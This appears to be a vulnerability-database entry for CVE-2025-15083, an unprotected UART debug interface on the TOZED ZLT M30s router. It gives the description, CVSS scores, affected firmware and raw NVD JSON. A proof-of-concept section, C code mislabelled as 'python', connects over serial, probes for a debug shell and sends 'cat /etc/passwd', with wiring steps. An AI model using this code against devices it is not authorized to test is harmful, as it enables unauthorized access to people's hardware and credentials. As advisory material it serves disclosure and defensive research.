Security Vulnerability Report
中文
CVE-2025-15083 CVSS 2.0 LOW

CVE-2025-15083

Published: 2025-12-25 18:15:40
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was determined in TOZED ZLT M30s up to 1.47. The affected element is an unknown function of the component UART Interface. Executing manipulation can lead to on-chip debug and test interface with improper access control. The physical device can be targeted for the attack. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
2.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:gztozed:zlt_m30s_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:gztozed:zlt_m30s:-:*:*:*:*:*:*:* - NOT VULNERABLE
TOZED ZLT M30s < 1.48
TOZED ZLT M30s firmware <= 1.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-15083 PoC - UART Interface Access // Target: TOZED ZLT M30s // Hardware Required: USB to TTL Serial Adapter, Jumper Wires #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <termios.h> #include <string.h> #define UART_DEVICE "/dev/ttyUSB0" #define BAUD_RATE B115200 int main() { int uart_fd; struct termios options; char buffer[256]; // Open UART device uart_fd = open(UART_DEVICE, O_RDWR | O_NOCTTY | O_NDELAY); if (uart_fd < 0) { perror("Error opening UART"); return -1; } // Configure UART parameters tcgetattr(uart_fd, &options); cfsetispeed(&options, BAUD_RATE); cfsetospeed(&options, BAUD_RATE); options.c_cflag |= (CS8 | CLOCAL | CREAD); options.c_iflag &= ~(IXON | IXOFF | IXANY); options.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG); tcsetattr(uart_fd, TCSANOW, &options); printf("[+] Connecting to TOZED ZLT M30s UART Interface...\n"); // Wait for device response sleep(2); // Read initial boot messages int bytes_read = read(uart_fd, buffer, sizeof(buffer)); if (bytes_read > 0) { buffer[bytes_read] = '\0'; printf("[+] Received data:\n%s\n", buffer); // Check for debug shell or credentials if (strstr(buffer, "login:") || strstr(buffer, "shell") || strstr(buffer, "#")) { printf("[!] Debug interface accessible - vulnerability confirmed\n"); } } // Send command to enumerate system char *cmd = "cat /etc/passwd\n"; write(uart_fd, cmd, strlen(cmd)); sleep(1); bytes_read = read(uart_fd, buffer, sizeof(buffer)); if (bytes_read > 0) { buffer[bytes_read] = '\0'; printf("[+] System enumeration result:\n%s\n", buffer); } close(uart_fd); return 0; } // Usage: // 1. Open TOZED ZLT M30s device casing // 2. Locate UART pins (TX, RX, GND, VCC) // 3. Connect USB-TTL adapter (GND->GND, TX->RX, RX->TX) // 4. Set baud rate: 115200, 8N1 // 5. Compile and run: gcc -o uart_poc uart_poc.c // 6. Observe boot messages and debug shell access

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15083", "sourceIdentifier": "[email protected]", "published": "2025-12-25T18:15:40.173", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in TOZED ZLT M30s up to 1.47. The affected element is an unknown function of the component UART Interface. Executing manipulation can lead to on-chip debug and test interface with improper access control. The physical device can be targeted for the attack. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.3, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 1.2, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1191"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:gztozed:zlt_m30s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.47", "matchCriteriaId": "206C4196-AA78-496B-967E-66660AC2E02B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:gztozed:zlt_m30s:-:*:*:*:*:*:*:*", "matchCriteriaId": "DCBA4183-9238-4E02-BEDB-FE2927BD77C7"}]}]}], "references": [{"url": "https://hacklab.eu.org/blogs/zlt_m30s_debug_interface", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338411", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338411", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707974", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.